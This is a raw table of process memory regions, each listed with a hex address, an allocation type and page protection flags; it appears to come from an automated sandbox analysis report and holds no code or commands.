unkown
|
page readonly
|
||
268108C0000
|
heap
|
page read and write
|
||
153E000
|
stack
|
page read and write
|
||
1FDEBBE0000
|
direct allocation
|
page read and write
|
||
56E0000
|
trusted library allocation
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
5654000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
567B000
|
trusted library allocation
|
page read and write
|
||
1489000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
7FF6BDA5D000
|
unkown
|
page write copy
|
||
79583FB000
|
stack
|
page read and write
|
||
4E4F000
|
stack
|
page read and write
|
||
56AC000
|
trusted library allocation
|
page read and write
|
||
7FF712718000
|
unkown
|
page execute and read and write
|
||
324E000
|
trusted library allocation
|
page read and write
|
||
79CA000
|
heap
|
page read and write
|
||
56B3000
|
trusted library allocation
|
page read and write
|
||
1AB4A130000
|
heap
|
page read and write
|
||
910000
|
direct allocation
|
page read and write
|
||
1F25000
|
heap
|
page read and write
|
||
1270000
|
heap
|
page read and write
|
||
1E3658C4000
|
heap
|
page read and write
|
||
7FF68FAFA000
|
unkown
|
page read and write
|
||
7FF69F311000
|
unkown
|
page execute and write copy
|
||
5662000
|
trusted library allocation
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
B181CFF000
|
stack
|
page read and write
|
||
268109DB000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
A3E7AFA000
|
stack
|
page read and write
|
||
2501000
|
heap
|
page read and write
|
||
D84000
|
heap
|
page read and write
|
||
569B000
|
trusted library allocation
|
page read and write
|
||
1E365890000
|
heap
|
page read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
DB4C2FA000
|
stack
|
page read and write
|
||
17B5000
|
heap
|
page read and write
|
||
4AA0000
|
direct allocation
|
page read and write
|
||
2045322A000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
D0E000
|
unkown
|
page execute and write copy
|
||
56A4000
|
trusted library allocation
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
7FF712561000
|
unkown
|
page execute and write copy
|
||
1627000
|
heap
|
page read and write
|
||
CFF000
|
unkown
|
page execute and read and write
|
||
26810A06000
|
heap
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
1477000
|
unkown
|
page execute and read and write
|
||
1D54000
|
heap
|
page read and write
|
||
1BB000
|
unkown
|
page execute and read and write
|
||
FA5000
|
heap
|
page read and write
|
||
15D8000
|
heap
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
458E000
|
stack
|
page read and write
|
||
2681092B000
|
heap
|
page read and write
|
||
1712000
|
direct allocation
|
page readonly
|
||
1E36585C000
|
heap
|
page read and write
|
||
5661000
|
trusted library allocation
|
page read and write
|
||
15FE000
|
heap
|
page read and write
|
||
1868D9E0000
|
heap
|
page read and write
|
||
5AE000
|
stack
|
page read and write
|
||
30D000
|
unkown
|
page readonly
|
||
476547E000
|
stack
|
page read and write
|
||
2681095A000
|
heap
|
page read and write
|
||
56C1000
|
trusted library allocation
|
page read and write
|
||
170E000
|
heap
|
page read and write
|
||
268109AB000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
1D566ACA000
|
heap
|
page read and write
|
||
1AB4A120000
|
heap
|
page read and write
|
||
15FB000
|
heap
|
page read and write
|
||
4D30000
|
direct allocation
|
page execute and read and write
|
||
C34000
|
heap
|
page read and write
|
||
2BAF000
|
stack
|
page read and write
|
||
5661000
|
trusted library allocation
|
page read and write
|
||
D52000
|
unkown
|
page execute and read and write
|
||
5683000
|
trusted library allocation
|
page read and write
|
||
1EA2D1D0000
|
heap
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
17BE000
|
stack
|
page read and write
|
||
56AC000
|
trusted library allocation
|
page read and write
|
||
74CB000
|
stack
|
page read and write
|
||
C30000
|
heap
|
page read and write
|
||
17A0000
|
heap
|
page read and write
|
||
1BB000
|
unkown
|
page execute and read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
B70000
|
heap
|
page read and write
|
||
2743DEDB000
|
heap
|
page read and write
|
||
A52BBFE000
|
stack
|
page read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
4BEF000
|
stack
|
page read and write
|
||
199000
|
stack
|
page read and write
|
||
11F0000
|
heap
|
page read and write
|
||
285000
|
unkown
|
page write copy
|
||
268107B0000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
CD7000
|
unkown
|
page execute and read and write
|
||
7FF68FAC0000
|
unkown
|
page readonly
|
||
2743DD90000
|
heap
|
page read and write
|
||
3DA000
|
unkown
|
page execute and read and write
|
||
3AE000
|
unkown
|
page execute and read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
56AA000
|
trusted library allocation
|
page read and write
|
||
5690000
|
trusted library allocation
|
page read and write
|
||
1AB4A1E1000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
D21000
|
heap
|
page read and write
|
||
248C0480000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4860000
|
heap
|
page execute and read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1868F4F0000
|
direct allocation
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
381E000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
E4944FF000
|
stack
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
658000
|
heap
|
page read and write
|
||
6900000
|
direct allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
CD4000
|
unkown
|
page execute and read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
1E365820000
|
heap
|
page read and write
|
||
C48000
|
heap
|
page read and write
|
||
1E3661E0000
|
heap
|
page read and write
|
||
CEC000
|
unkown
|
page write copy
|
||
C34000
|
heap
|
page read and write
|
||
3BF000
|
unkown
|
page execute and read and write
|
||
1294000
|
heap
|
page read and write
|
||
322E000
|
stack
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
4610000
|
heap
|
page read and write
|
||
2006EAA9000
|
heap
|
page read and write
|
||
2681097D000
|
heap
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
489F000
|
stack
|
page read and write
|
||
56E000
|
stack
|
page read and write
|
||
47CE000
|
stack
|
page read and write
|
||
6ADA000
|
direct allocation
|
page read and write
|
||
2200000
|
trusted library allocation
|
page execute and read and write
|
||
2743F790000
|
direct allocation
|
page read and write
|
||
570A000
|
trusted library allocation
|
page read and write
|
||
35AF000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
DEA000
|
heap
|
page read and write
|
||
3060000
|
heap
|
page read and write
|
||
1D566ACA000
|
heap
|
page read and write
|
||
23F5000
|
heap
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1A2FF7F000
|
unkown
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
370F000
|
stack
|
page read and write
|
||
690000
|
heap
|
page read and write
|
||
E00000
|
unkown
|
page execute and write copy
|
||
4CB0000
|
direct allocation
|
page execute and read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
3345000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
17DF000
|
heap
|
page read and write
|
||
440000
|
heap
|
page read and write
|
||
5774000
|
trusted library allocation
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
382000
|
unkown
|
page execute and read and write
|
||
17BE000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
1D566ACA000
|
heap
|
page read and write
|
||
5676000
|
trusted library allocation
|
page read and write
|
||
17B5000
|
heap
|
page read and write
|
||
5719000
|
trusted library allocation
|
page read and write
|
||
3D0000
|
unkown
|
page execute and read and write
|
||
2F8F000
|
stack
|
page read and write
|
||
A9E000
|
stack
|
page read and write
|
||
7FF68FAC1000
|
unkown
|
page execute read
|
||
1FE60CAC000
|
heap
|
page read and write
|
||
56BE000
|
trusted library allocation
|
page read and write
|
||
67E0000
|
heap
|
page read and write
|
||
86FD000
|
stack
|
page read and write
|
||
16DE000
|
stack
|
page read and write
|
||
4602000
|
heap
|
page read and write
|
||
883B000
|
stack
|
page read and write
|
||
DED000
|
unkown
|
page execute and read and write
|
||
4E60000
|
heap
|
page read and write
|
||
569E000
|
trusted library allocation
|
page read and write
|
||
DAE000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
4E0E000
|
stack
|
page read and write
|
||
47AF9FE000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
2681097F000
|
heap
|
page read and write
|
||
26810973000
|
heap
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
3D7000
|
unkown
|
page execute and write copy
|
||
6A40000
|
direct allocation
|
page read and write
|
||
5699000
|
trusted library allocation
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
56F0000
|
trusted library allocation
|
page read and write
|
||
1E36583B000
|
heap
|
page read and write
|
||
1E365DB0000
|
remote allocation
|
page read and write
|
||
26810A06000
|
heap
|
page read and write
|
||
1BB000
|
unkown
|
page execute and write copy
|
||
1F0F000
|
heap
|
page read and write
|
||
1F27000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1D566ACA000
|
heap
|
page read and write
|
||
56E8000
|
trusted library allocation
|
page read and write
|
||
248C039B000
|
heap
|
page read and write
|
||
56D3000
|
trusted library allocation
|
page read and write
|
||
435E000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
566B000
|
trusted library allocation
|
page read and write
|
||
7230000
|
heap
|
page read and write
|
||
2B9E000
|
stack
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
56D4000
|
trusted library allocation
|
page read and write
|
||
56B9000
|
trusted library allocation
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
7FF68FAC1000
|
unkown
|
page execute read
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
C81000
|
unkown
|
page execute read
|
||
D8A000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
150000
|
unkown
|
page read and write
|
||
D3A000
|
unkown
|
page execute and read and write
|
||
4601000
|
heap
|
page read and write
|
||
7490000
|
direct allocation
|
page read and write
|
||
56AC000
|
trusted library allocation
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
1F25000
|
heap
|
page read and write
|
||
1755000
|
heap
|
page read and write
|
||
56D8000
|
trusted library allocation
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
1106000
|
unkown
|
page write copy
|
||
7FF68FAC0000
|
unkown
|
page readonly
|
||
1AB4A1CB000
|
heap
|
page read and write
|
||
280E000
|
stack
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
7FF68FAFD000
|
unkown
|
page readonly
|
||
2C9F000
|
stack
|
page read and write
|
||
1F31000
|
heap
|
page read and write
|
||
5694000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
56A3000
|
trusted library allocation
|
page read and write
|
||
26812590000
|
remote allocation
|
page read and write
|
||
5667000
|
trusted library allocation
|
page read and write
|
||
1EA2D3C0000
|
heap
|
page read and write
|
||
50BF000
|
stack
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
336000
|
unkown
|
page execute and write copy
|
||
46F1000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
359E000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
24F0000
|
heap
|
page read and write
|
||
567F000
|
trusted library allocation
|
page read and write
|
||
7957DFE000
|
stack
|
page read and write
|
||
56AB000
|
trusted library allocation
|
page read and write
|
||
56E1000
|
trusted library allocation
|
page read and write
|
||
5670000
|
trusted library allocation
|
page read and write
|
||
569B000
|
trusted library allocation
|
page read and write
|
||
2F1000
|
unkown
|
page readonly
|
||
CEC000
|
unkown
|
page read and write
|
||
2006EAAC000
|
heap
|
page read and write
|
||
319F000
|
stack
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
369F000
|
stack
|
page read and write
|
||
2500000
|
heap
|
page read and write
|
||
8AAB000
|
stack
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
435E000
|
stack
|
page read and write
|
||
2681096F000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
386E000
|
stack
|
page read and write
|
||
1E3661F1000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
4C80000
|
direct allocation
|
page execute and read and write
|
||
1FF000
|
unkown
|
page readonly
|
||
46F1000
|
heap
|
page read and write
|
||
5690000
|
trusted library allocation
|
page read and write
|
||
DFD000
|
unkown
|
page execute and write copy
|
||
1A3027F000
|
stack
|
page read and write
|
||
9C0000
|
unkown
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
5661000
|
trusted library allocation
|
page read and write
|
||
1F0C000
|
heap
|
page read and write
|
||
568D000
|
trusted library allocation
|
page read and write
|
||
2F5E000
|
stack
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
5680000
|
trusted library allocation
|
page read and write
|
||
2A1000
|
unkown
|
page execute read
|
||
79586FF000
|
stack
|
page read and write
|
||
1587000
|
heap
|
page read and write
|
||
56B1000
|
trusted library allocation
|
page read and write
|
||
2910000
|
heap
|
page read and write
|
||
4E50000
|
trusted library allocation
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
1D94EF30000
|
heap
|
page read and write
|
||
7FF68FAFD000
|
unkown
|
page readonly
|
||
1B778615000
|
heap
|
page read and write
|
||
4A90000
|
direct allocation
|
page read and write
|
||
431F000
|
stack
|
page read and write
|
||
56D7000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
177D000
|
heap
|
page read and write
|
||
13060FF000
|
stack
|
page read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
57E0000
|
heap
|
page read and write
|
||
371000
|
unkown
|
page execute and write copy
|
||
26810920000
|
heap
|
page read and write
|
||
305F000
|
stack
|
page read and write
|
||
1E365820000
|
heap
|
page read and write
|
||
568F000
|
trusted library allocation
|
page read and write
|
||
56AC000
|
trusted library allocation
|
page read and write
|
||
2006EA40000
|
heap
|
page read and write
|
||
3E1F000
|
stack
|
page read and write
|
||
14075E000
|
unkown
|
page execute read
|
||
20EB000
|
trusted library allocation
|
page execute and read and write
|
||
1E36585B000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
2A0000
|
unkown
|
page readonly
|
||
4E61000
|
heap
|
page read and write
|
||
1D911875000
|
heap
|
page read and write
|
||
1E3661F1000
|
heap
|
page read and write
|
||
164E000
|
stack
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
CCF000
|
unkown
|
page readonly
|
||
7011000
|
heap
|
page read and write
|
||
4710000
|
trusted library allocation
|
page read and write
|
||
5693000
|
trusted library allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
5450000
|
direct allocation
|
page execute and read and write
|
||
31C000
|
unkown
|
page execute and write copy
|
||
3A5F000
|
stack
|
page read and write
|
||
56CD000
|
trusted library allocation
|
page read and write
|
||
4E3E000
|
stack
|
page read and write
|
||
268125C2000
|
heap
|
page read and write
|
||
1613000
|
heap
|
page read and write
|
||
459F000
|
stack
|
page read and write
|
||
26810978000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
2B9C2230000
|
heap
|
page read and write
|
||
1762000
|
heap
|
page read and write
|
||
4D0D000
|
stack
|
page read and write
|
||
336000
|
unkown
|
page execute and write copy
|
||
57F0000
|
heap
|
page read and write
|
||
47A0000
|
heap
|
page read and write
|
||
5A267FE000
|
stack
|
page read and write
|
||
6E5E2FE000
|
stack
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
1E36587C000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
7FF6BDA40000
|
unkown
|
page readonly
|
||
865000
|
unkown
|
page execute and write copy
|
||
E4942FC000
|
stack
|
page read and write
|
||
4C1E000
|
stack
|
page read and write
|
||
268109C1000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4C00000
|
direct allocation
|
page execute and read and write
|
||
20454C10000
|
heap
|
page read and write
|
||
7FF68FAFD000
|
unkown
|
page readonly
|
||
7011000
|
heap
|
page read and write
|
||
16B70190000
|
heap
|
page read and write
|
||
39A000
|
unkown
|
page execute and read and write
|
||
1AB4A1A0000
|
direct allocation
|
page read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
2268000
|
direct allocation
|
page execute read
|
||
7011000
|
heap
|
page read and write
|
||
1E70000
|
heap
|
page read and write
|
||
268108E0000
|
trusted library allocation
|
page read and write
|
||
382F000
|
stack
|
page read and write
|
||
569B000
|
trusted library allocation
|
page read and write
|
||
D9E000
|
heap
|
page read and write
|
||
31C000
|
unkown
|
page execute and write copy
|
||
1E365847000
|
heap
|
page read and write
|
||
4D00000
|
direct allocation
|
page execute and read and write
|
||
DE8000
|
unkown
|
page execute and read and write
|
||
1E365E95000
|
heap
|
page read and write
|
||
2100000
|
trusted library allocation
|
page read and write
|
||
2917000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
4D00000
|
direct allocation
|
page execute and read and write
|
||
102D000
|
unkown
|
page readonly
|
||
1504000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1868F2B0000
|
heap
|
page read and write
|
||
6BBB000
|
stack
|
page read and write
|
||
569E000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
35EE000
|
stack
|
page read and write
|
||
140738000
|
unkown
|
page read and write
|
||
2032D77B000
|
heap
|
page read and write
|
||
2681096B000
|
heap
|
page read and write
|
||
16C1000
|
direct allocation
|
page execute read
|
||
14042E000
|
unkown
|
page read and write
|
||
548D000
|
stack
|
page read and write
|
||
2700000
|
direct allocation
|
page read and write
|
||
1E3658C2000
|
heap
|
page read and write
|
||
1E365828000
|
heap
|
page read and write
|
||
1D566AAE000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
2681099A000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
4C80000
|
direct allocation
|
page execute and read and write
|
||
1EA2D6A0000
|
trusted library allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
4E5F000
|
stack
|
page read and write
|
||
CEC000
|
unkown
|
page read and write
|
||
576E000
|
trusted library allocation
|
page read and write
|
||
1868F3B0000
|
direct allocation
|
page read and write
|
||
1E36582D000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
CFE000
|
unkown
|
page execute and write copy
|
||
7011000
|
heap
|
page read and write
|
||
16B700E0000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
8C11000
|
heap
|
page read and write
|
||
DF0000
|
heap
|
page read and write
|
||
5668000
|
trusted library allocation
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
439000
|
unkown
|
page execute and write copy
|
||
4C10000
|
direct allocation
|
page execute and read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
C34000
|
heap
|
page read and write
|
||
7FF69F4CD000
|
unkown
|
page execute and read and write
|
||
1FE60F35000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
569D000
|
trusted library allocation
|
page read and write
|
||
1FDEBC1B000
|
heap
|
page read and write
|
||
16E0000
|
direct allocation
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
77E0000
|
direct allocation
|
page execute and read and write
|
||
1294000
|
heap
|
page read and write
|
||
1FDEBB80000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
80E000
|
stack
|
page read and write
|
||
2CEF000
|
stack
|
page read and write
|
||
41DF000
|
stack
|
page read and write
|
||
1F0F000
|
heap
|
page read and write
|
||
8BE000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
1E365822000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
578D000
|
trusted library allocation
|
page read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
381E000
|
stack
|
page read and write
|
||
2006EAA0000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
36AE000
|
stack
|
page read and write
|
||
1FB3D660000
|
heap
|
page read and write
|
||
5699000
|
trusted library allocation
|
page read and write
|
||
231E000
|
stack
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
7730000
|
direct allocation
|
page execute and read and write
|
||
D94000
|
heap
|
page read and write
|
||
676000
|
heap
|
page read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
45F000
|
unkown
|
page execute and read and write
|
||
4E61000
|
heap
|
page read and write
|
||
7FF6BDA5D000
|
unkown
|
page read and write
|
||
2681098C000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
5A2677F000
|
stack
|
page read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
1FDED580000
|
heap
|
page read and write
|
||
2907000
|
heap
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
26810A08000
|
heap
|
page read and write
|
||
2681099F000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
15C9000
|
heap
|
page read and write
|
||
CFA000
|
heap
|
page read and write
|
||
568F000
|
trusted library allocation
|
page read and write
|
||
77B0000
|
direct allocation
|
page execute and read and write
|
||
C34000
|
heap
|
page read and write
|
||
48D78FC000
|
stack
|
page read and write
|
||
E00000
|
heap
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
4C4E000
|
stack
|
page read and write
|
||
567F000
|
trusted library allocation
|
page read and write
|
||
1290000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
3ECE000
|
stack
|
page read and write
|
||
2A1000
|
unkown
|
page execute read
|
||
7011000
|
heap
|
page read and write
|
||
4CA0000
|
direct allocation
|
page execute and read and write
|
||
46F1000
|
heap
|
page read and write
|
||
476537F000
|
stack
|
page read and write
|
||
1200000
|
heap
|
page read and write
|
||
17BD000
|
heap
|
page read and write
|
||
4CC0000
|
direct allocation
|
page execute and read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
4C20000
|
direct allocation
|
page execute and read and write
|
||
1504000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
54D0000
|
direct allocation
|
page execute and read and write
|
||
26810975000
|
heap
|
page read and write
|
||
26810989000
|
heap
|
page read and write
|
||
1E3661FB000
|
heap
|
page read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
3A00000
|
direct allocation
|
page read and write
|
||
154E000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
1E36587E000
|
heap
|
page read and write
|
||
30000
|
unkown
|
page readonly
|
||
4601000
|
heap
|
page read and write
|
||
26810A08000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
15E8000
|
heap
|
page read and write
|
||
D5F000
|
unkown
|
page execute and read and write
|
||
4E61000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
56EA000
|
trusted library allocation
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
17A2000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1770000
|
remote allocation
|
page read and write
|
||
CEC000
|
unkown
|
page write copy
|
||
4601000
|
heap
|
page read and write
|
||
16B700D0000
|
heap
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
3B0E000
|
stack
|
page read and write
|
||
44F000
|
unkown
|
page execute and write copy
|
||
422000
|
unkown
|
page write copy
|
||
1540000
|
heap
|
page read and write
|
||
C9E000
|
stack
|
page read and write
|
||
7FF712290000
|
unkown
|
page readonly
|
||
2A0000
|
unkown
|
page readonly
|
||
4B40000
|
heap
|
page read and write
|
||
202A8FC0000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
66E000
|
stack
|
page read and write
|
||
50FE000
|
stack
|
page read and write
|
||
2B9C2330000
|
heap
|
page read and write
|
||
5661000
|
trusted library allocation
|
page read and write
|
||
7BD0000
|
direct allocation
|
page read and write
|
||
4F60000
|
trusted library allocation
|
page read and write
|
||
7450000
|
heap
|
page read and write
|
||
DAA000
|
heap
|
page read and write
|
||
140000000
|
unkown
|
page read and write
|
||
3324000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
495F000
|
stack
|
page read and write
|
||
3C8000
|
unkown
|
page execute and write copy
|
||
1406B6000
|
unkown
|
page read and write
|
||
454E000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
140738000
|
unkown
|
page read and write
|
||
F7E000
|
stack
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
D4F000
|
unkown
|
page execute and write copy
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
A3E81FB000
|
stack
|
page read and write
|
||
26810A06000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
5693000
|
trusted library allocation
|
page read and write
|
||
3B2000
|
unkown
|
page execute and read and write
|
||
1D94EF40000
|
heap
|
page read and write
|
||
76F000
|
stack
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
E4943FE000
|
stack
|
page read and write
|
||
5674000
|
trusted library allocation
|
page read and write
|
||
CEC000
|
unkown
|
page write copy
|
||
5800000
|
direct allocation
|
page read and write
|
||
4E71000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
5815000
|
trusted library allocation
|
page read and write
|
||
140000
|
unkown
|
page readonly
|
||
370000
|
unkown
|
page execute and write copy
|
||
7FF6BD9D1000
|
unkown
|
page execute read
|
||
64FC000
|
direct allocation
|
page read and write
|
||
CE2000
|
unkown
|
page execute and read and write
|
||
1D90FC70000
|
heap
|
page read and write
|
||
16BF000
|
stack
|
page read and write
|
||
1762000
|
heap
|
page read and write
|
||
569F000
|
trusted library allocation
|
page read and write
|
||
56AA000
|
trusted library allocation
|
page read and write
|
||
1587000
|
heap
|
page read and write
|
||
5662000
|
trusted library allocation
|
page read and write
|
||
5683000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
45D000
|
unkown
|
page execute and read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
3BAC000
|
stack
|
page read and write
|
||
7DCF000
|
stack
|
page read and write
|
||
1E3661EE000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
67E5000
|
heap
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
47652FF000
|
unkown
|
page read and write
|
||
7FF68FAE9000
|
unkown
|
page readonly
|
||
30EB000
|
stack
|
page read and write
|
||
A52BAFC000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
1D90FDEB000
|
heap
|
page read and write
|
||
567B000
|
trusted library allocation
|
page read and write
|
||
1EB3000
|
heap
|
page read and write
|
||
7FF68FAE9000
|
unkown
|
page readonly
|
||
7800000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
41A000
|
unkown
|
page readonly
|
||
46F1000
|
heap
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
3D9000
|
unkown
|
page execute and write copy
|
||
893C000
|
stack
|
page read and write
|
||
5674000
|
trusted library allocation
|
page read and write
|
||
268109B3000
|
heap
|
page read and write
|
||
16B70100000
|
heap
|
page read and write
|
||
7FF6BD9D0000
|
unkown
|
page readonly
|
||
1EA2D6A0000
|
trusted library allocation
|
page read and write
|
||
4D45000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
59E000
|
unkown
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
CEC000
|
unkown
|
page read and write
|
||
56D6000
|
trusted library allocation
|
page read and write
|
||
1E3661F4000
|
heap
|
page read and write
|
||
26810A08000
|
heap
|
page read and write
|
||
2D2E000
|
stack
|
page read and write
|
||
4E61000
|
